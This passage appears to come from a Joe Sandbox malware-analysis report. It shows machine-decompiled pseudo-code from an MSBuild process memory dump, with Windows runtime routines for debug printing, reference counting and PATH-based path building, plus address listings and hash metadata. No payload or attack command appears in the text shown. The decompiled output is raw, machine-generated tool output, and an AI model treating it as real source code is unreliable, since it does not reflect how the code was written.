										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											E010FDEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E010EB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E010EB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E010EE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E010EA890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                                                                0x010ab171
                                                                                                0x010ab171
                                                                                                0x010ab171
                                                                                                0x010ab171
                                                                                                0x010ab171
                                                                                                0x010ab176
                                                                                                0x010ab17b
                                                                                                0x010ab180
                                                                                                0x010ab186
                                                                                                0x010ab18f
                                                                                                0x010ab198
                                                                                                0x010ab1a4
                                                                                                0x010ab1aa
                                                                                                0x01104802
                                                                                                0x01104802
                                                                                                0x01104805
                                                                                                0x0110480c
                                                                                                0x0110480e
                                                                                                0x010ab1d1
                                                                                                0x010ab1d3
                                                                                                0x010ab1de
                                                                                                0x010ab1de
                                                                                                0x01104817
                                                                                                0x0110481e
                                                                                                0x01104820
                                                                                                0x01104822
                                                                                                0x01104822
                                                                                                0x01104824
                                                                                                0x01104824
                                                                                                0x0110482a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01104835
                                                                                                0x0110483a
                                                                                                0x0110483d
                                                                                                0x0110483f
                                                                                                0x01104842
                                                                                                0x01104842
                                                                                                0x01104842
                                                                                                0x01104846
                                                                                                0x0110484c
                                                                                                0x0110484e
                                                                                                0x01104851
                                                                                                0x01104851
                                                                                                0x01104853
                                                                                                0x01104854
                                                                                                0x01104854
                                                                                                0x01104858
                                                                                                0x0110485a
                                                                                                0x0110485a
                                                                                                0x0110485d
                                                                                                0x0110485f
                                                                                                0x01104861
                                                                                                0x01104861
                                                                                                0x01104866
                                                                                                0x0110486b
                                                                                                0x0110486e
                                                                                                0x01104871
                                                                                                0x01104876
                                                                                                0x01104876
                                                                                                0x01104878
                                                                                                0x0110487b
                                                                                                0x01104884
                                                                                                0x01104884
                                                                                                0x00000000
                                                                                                0x0110487d
                                                                                                0x0110487d
                                                                                                0x01104882
                                                                                                0x01104889
                                                                                                0x01104889
                                                                                                0x0110488f
                                                                                                0x01104891
                                                                                                0x011048e0
                                                                                                0x011048e2
                                                                                                0x011048e4
                                                                                                0x011048e4
                                                                                                0x011048e7
                                                                                                0x011048e7
                                                                                                0x011048ed
                                                                                                0x011048f4
                                                                                                0x011048f6
                                                                                                0x01104951
                                                                                                0x01104951
                                                                                                0x01104953
                                                                                                0x01104953
                                                                                                0x01104956
                                                                                                0x01104956
                                                                                                0x01104958
                                                                                                0x01104959
                                                                                                0x01104959
                                                                                                0x0110495d
                                                                                                0x0110495d
                                                                                                0x0110495f
                                                                                                0x0110495f
                                                                                                0x01104965
                                                                                                0x01104969
                                                                                                0x011049ba
                                                                                                0x011049ba
                                                                                                0x011049c1
                                                                                                0x011049c5
                                                                                                0x011049cc
                                                                                                0x011049d4
                                                                                                0x011049d7
                                                                                                0x011049da
                                                                                                0x011049e4
                                                                                                0x011049e5
                                                                                                0x011049f3
                                                                                                0x01104a02
                                                                                                0x00000000
                                                                                                0x01104a02
                                                                                                0x01104972
                                                                                                0x01104974
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01104976
                                                                                                0x01104979
                                                                                                0x01104982
                                                                                                0x01104983
                                                                                                0x01104984
                                                                                                0x0110498b
                                                                                                0x0110498d
                                                                                                0x01104991
                                                                                                0x01104993
                                                                                                0x01104999
                                                                                                0x0110499d
                                                                                                0x011049a2
                                                                                                0x011049a2
                                                                                                0x011049a2
                                                                                                0x01104999
                                                                                                0x011049ac
                                                                                                0x00000000
                                                                                                0x011049b3
                                                                                                0x011048f8
                                                                                                0x011048fe
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x011048fe
                                                                                                0x01104895
                                                                                                0x0110489c
                                                                                                0x011048ad
                                                                                                0x011048b2
                                                                                                0x011048b5
                                                                                                0x011048b7
                                                                                                0x011048ba
                                                                                                0x011048bc
                                                                                                0x011048c6
                                                                                                0x011048c6
                                                                                                0x011048cb
                                                                                                0x011048d1
                                                                                                0x011048d4
                                                                                                0x011048d8
                                                                                                0x011048d8
                                                                                                0x00000000
                                                                                                0x011048d8
                                                                                                0x011048be
                                                                                                0x011048c0
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x011048c2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x011048c4
                                                                                                0x00000000
                                                                                                0x01104882
                                                                                                0x0110487b
                                                                                                0x01104904
                                                                                                0x01104906
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01104908
                                                                                                0x0110490e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01104910
                                                                                                0x01104917
                                                                                                0x01104917
                                                                                                0x00000000
                                                                                                0x01104917
                                                                                                0x010ab1ba
                                                                                                0x011047f9
                                                                                                0x011047fc
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x011047fc
                                                                                                0x010ab1c0
                                                                                                0x010ab1c0
                                                                                                0x010ab1c3
                                                                                                0x010ab1cb
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: _vswprintf_s
                                                                                                • String ID:
                                                                                                • API String ID: 677850445-0
                                                                                                • Opcode ID: d0c51e213e3d25295421fe404dd448254e2fc9ea4e7ee355df88bb8422006d1c
                                                                                                • Instruction ID: 501c5b33a3604d8ede20d84c1ffb861aecd7c05730cf8c3d1f8d7d5f153daa01
                                                                                                • Opcode Fuzzy Hash: d0c51e213e3d25295421fe404dd448254e2fc9ea4e7ee355df88bb8422006d1c
                                                                                                • Instruction Fuzzy Hash: 7551D771D002598EDF3ACFA8C8857AEBBF0BF04710F1145AEDA999B6C1D7B04A41CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010E4A2C Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 58%
                                                                                                			E010E4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x119d360 ^ _t62;
				_v8 =  *0x119d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E010C2280(_t26, 0x1198608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E010BFFB0(_t41, _t51, 0x1198608);
						L2:
						 *0x119b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E010EB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E010C2280(_t28, 0x1198608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E010BFFB0(_t42, _t53, 0x1198608);
							if(_t53 != 0) {
								L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E010BFFB0(_t41, _t51, 0x1198608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                                                                                0x010e4a2c
                                                                                                0x010e4a34
                                                                                                0x010e4a3c
                                                                                                0x010e4a3e
                                                                                                0x010e4a48
                                                                                                0x010e4a4b
                                                                                                0x010e4a4d
                                                                                                0x010e4a51
                                                                                                0x010e4a9c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010e4aa3
                                                                                                0x010e4aa8
                                                                                                0x010e4aad
                                                                                                0x010e4ab1
                                                                                                0x010e4ade
                                                                                                0x010e4ae3
                                                                                                0x010e4a5a
                                                                                                0x010e4a62
                                                                                                0x010e4a6a
                                                                                                0x010e4a6e
                                                                                                0x0111f203
                                                                                                0x010e4a84
                                                                                                0x010e4a88
                                                                                                0x010e4a89
                                                                                                0x010e4a8a
                                                                                                0x010e4a95
                                                                                                0x010e4a95
                                                                                                0x010e4a79
                                                                                                0x010e4a80
                                                                                                0x010e4af2
                                                                                                0x010e4af4
                                                                                                0x010e4af9
                                                                                                0x010e4aff
                                                                                                0x010e4b01
                                                                                                0x010e4b03
                                                                                                0x010e4b08
                                                                                                0x0111f20a
                                                                                                0x0111f212
                                                                                                0x0111f216
                                                                                                0x0111f216
                                                                                                0x010e4b08
                                                                                                0x010e4b13
                                                                                                0x010e4b1a
                                                                                                0x0111f229
                                                                                                0x0111f229
                                                                                                0x010e4b1a
                                                                                                0x010e4a82
                                                                                                0x00000000
                                                                                                0x010e4a82
                                                                                                0x010e4ab7
                                                                                                0x010e4acd
                                                                                                0x010e4acd
                                                                                                0x010e4ad5
                                                                                                0x010e4ada
                                                                                                0x00000000
                                                                                                0x010e4ada
                                                                                                0x010e4ac2
                                                                                                0x010e4acb
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010e4acb
                                                                                                0x010e4a53
                                                                                                0x010e4a53
                                                                                                0x010e4a58
                                                                                                0x00000000

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: DebugPrintTimes
                                                                                                • String ID:
                                                                                                • API String ID: 3446177414-0
                                                                                                • Opcode ID: d28487231180396aac35b9bbdb1756b93408905693353233ab2680eda4c0eaf7
                                                                                                • Instruction ID: fda87b79bcfbe5b5d0519bccca650f10dbcfb3f67871114ef048167907fdbcc9
                                                                                                • Opcode Fuzzy Hash: d28487231180396aac35b9bbdb1756b93408905693353233ab2680eda4c0eaf7
                                                                                                • Instruction Fuzzy Hash: 123104322052129FCB659F5AC988B6AFBE5FF85B20F09056DE4A6CB641C770D805CBC5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010C0050 Relevance: 1.6, APIs: 1, Instructions: 81timeCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 53%
                                                                                                			E010C0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x119d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E010D9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E010EB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E01178A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E010D9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x119b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                                                                                0x010c0055
                                                                                                0x010c005d
                                                                                                0x010c0062
                                                                                                0x010c006c
                                                                                                0x010c006f
                                                                                                0x010c0074
                                                                                                0x010c007a
                                                                                                0x010c007a
                                                                                                0x010c0080
                                                                                                0x010c0080
                                                                                                0x010c0087
                                                                                                0x010c008d
                                                                                                0x010c008f
                                                                                                0x010c0093
                                                                                                0x010c0095
                                                                                                0x010c009b
                                                                                                0x010c00f8
                                                                                                0x010c00fb
                                                                                                0x010c00fc
                                                                                                0x010c00ff
                                                                                                0x010c0108
                                                                                                0x010c0108
                                                                                                0x010c00a2
                                                                                                0x010c00a6
                                                                                                0x010c00b3
                                                                                                0x010c00bc
                                                                                                0x010c00c5
                                                                                                0x010c00ca
                                                                                                0x0110c01e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0110c02d
                                                                                                0x010c00d5
                                                                                                0x010c00d9
                                                                                                0x0110c03d
                                                                                                0x0110c046
                                                                                                0x0110c046
                                                                                                0x010c00df
                                                                                                0x010c00e2
                                                                                                0x010c00ea
                                                                                                0x010c00ef
                                                                                                0x010c00f2
                                                                                                0x010c00f6
                                                                                                0x010c0111
                                                                                                0x010c0117
                                                                                                0x010c0117
                                                                                                0x00000000
                                                                                                0x010c00f6
                                                                                                0x010c00d0
                                                                                                0x010c00d0
                                                                                                0x00000000

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: DebugPrintTimes
                                                                                                • String ID:
                                                                                                • API String ID: 3446177414-0
                                                                                                • Opcode ID: 48b89a69bd544650103ebfebb8c4208d19916da4fbc2de96fcc642c9b93c9105
                                                                                                • Instruction ID: 53199003df719cbc887f1431d6d8569afe0a9feffe6752a857a9a1963874d9b0
                                                                                                • Opcode Fuzzy Hash: 48b89a69bd544650103ebfebb8c4208d19916da4fbc2de96fcc642c9b93c9105
                                                                                                • Instruction Fuzzy Hash: 7331CE35201B04CFD726CB28C840B9AB3E5FF88714F2445ADF4A687694DB31A801CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010D2581 Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 83%
                                                                                                			E010D2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t230;
				signed int _t234;
				signed int _t237;
				signed int _t247;
				signed int _t249;
				intOrPtr _t251;
				signed int _t254;
				signed int _t261;
				signed int _t264;
				signed int _t272;
				signed int _t278;
				signed int _t280;
				void* _t283;
				signed int _t284;
				unsigned int _t287;
				signed int _t291;
				void* _t292;
				signed int _t293;
				signed int _t297;
				intOrPtr _t309;
				signed int _t318;
				signed int _t320;
				signed int _t321;
				signed int _t325;
				signed int _t326;
				signed int _t329;
				signed int _t331;
				signed int _t333;
				void* _t334;
				void* _t337;

				_t331 = _t333;
				_t334 = _t333 - 0x4c;
				_v8 =  *0x119d360 ^ _t331;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t325 = 0x119b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t287 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t278 = 0x48;
				_t307 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t318 = 0;
				_v37 = _t307;
				if(_v48 <= 0) {
					L16:
					_t45 = _t278 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t326 = 0xc0000106;
						goto L32;
					} else {
						_t325 = L010C4620(_t287,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t278);
						_v52 = _t325;
						__eflags = _t325;
						if(_t325 == 0) {
							_t326 = 0xc0000017;
							goto L32;
						} else {
							 *(_t325 + 0x44) =  *(_t325 + 0x44) & 0x00000000;
							_t50 = _t325 + 0x48; // 0x48
							_t320 = _t50;
							_t307 = _v32;
							 *(_t325 + 0x3c) = _t278;
							_t280 = 0;
							 *((short*)(_t325 + 0x30)) = _v48;
							__eflags = _t307;
							if(_t307 != 0) {
								 *(_t325 + 0x18) = _t320;
								__eflags = _t307 - 0x1198478;
								 *_t325 = ((0 | _t307 == 0x01198478) - 0x00000001 & 0xfffffffb) + 7;
								E010EF3E0(_t320,  *((intOrPtr*)(_t307 + 4)),  *_t307 & 0x0000ffff);
								_t307 = _v32;
								_t334 = _t334 + 0xc;
								_t280 = 1;
								__eflags = _a8;
								_t320 = _t320 + (( *_t307 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t272 = E011339F2(_t320);
									_t307 = _v32;
									_t320 = _t272;
								}
							}
							_t291 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t326 = _v68;
								__eflags = 0;
								 *((short*)(_t320 - 2)) = 0;
								goto L32;
							} else {
								_t278 = _t325 + _t280 * 4;
								_v56 = _t278;
								do {
									__eflags = _t307;
									if(_t307 != 0) {
										_t230 =  *(_v60 + _t291 * 4);
										__eflags = _t230;
										if(_t230 == 0) {
											goto L30;
										} else {
											__eflags = _t230 == 5;
											if(_t230 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t278 =  *(_v60 + _t291 * 4);
										 *(_t278 + 0x18) = _t320;
										_t234 =  *(_v60 + _t291 * 4);
										__eflags = _t234 - 8;
										if(_t234 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t234 * 4 +  &M010D2959))) {
												case 0:
													__ax =  *0x1198488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E010EF3E0(__edi,  *0x119848c, __ax & 0x0000ffff);
														__eax =  *0x1198488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E010EF3E0(_t320, _v80, _v64);
													_t267 = _v64;
													goto L26;
												case 2:
													 *0x1198480 & 0x0000ffff = E010EF3E0(__edi,  *0x1198484,  *0x1198480 & 0x0000ffff);
													__eax =  *0x1198480 & 0x0000ffff;
													__eax = ( *0x1198480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E010EF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E010EF3E0(_t320, _v76, _v36);
														_t267 = _v36;
													}
													L26:
													_t334 = _t334 + 0xc;
													_t320 = _t320 + (_t267 >> 1) * 2 + 2;
													__eflags = _t320;
													L27:
													_push(0x3b);
													_pop(_t269);
													 *((short*)(_t320 - 2)) = _t269;
													goto L28;
												case 6:
													__ebx =  *0x119575c;
													__eflags = __ebx - 0x119575c;
													if(__ebx != 0x119575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E010EF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x119575c;
														} while (__ebx != 0x119575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x1198478 & 0x0000ffff = E010EF3E0(__edi,  *0x119847c,  *0x1198478 & 0x0000ffff);
													__eax =  *0x1198478 & 0x0000ffff;
													__eax = ( *0x1198478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E011339F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x1196e58 & 0x0000ffff = E010EF3E0(__edi,  *0x1196e5c,  *0x1196e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x1196e58 & 0x0000ffff;
													__eax = ( *0x1196e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t291 = _v16;
													_t307 = _v32;
													L29:
													_t278 = _t278 + 4;
													__eflags = _t278;
													_v56 = _t278;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t291 = _t291 + 1;
									_v16 = _t291;
									__eflags = _t291 - _v48;
								} while (_t291 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t234 =  *(_v60 + _t318 * 4);
						if(_t234 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t234 * 4 +  &M010D2935))) {
							case 0:
								__ax =  *0x1198488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t307 =  &_v64;
								_v80 = E010D2E3E(0,  &_v64);
								_t278 = _t278 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x1198480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1198480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E010BEEF0(0x11979a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E010BEB70(__ecx, 0x11979a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t208 = _v72;
											__eflags = _t208;
											if(_t208 != 0) {
												L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t208);
											}
											_t209 = _v52;
											__eflags = _t209;
											if(_t209 != 0) {
												__eflags = _t326;
												if(_t326 < 0) {
													L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t209);
													_t209 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t287 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x1197b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L010C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
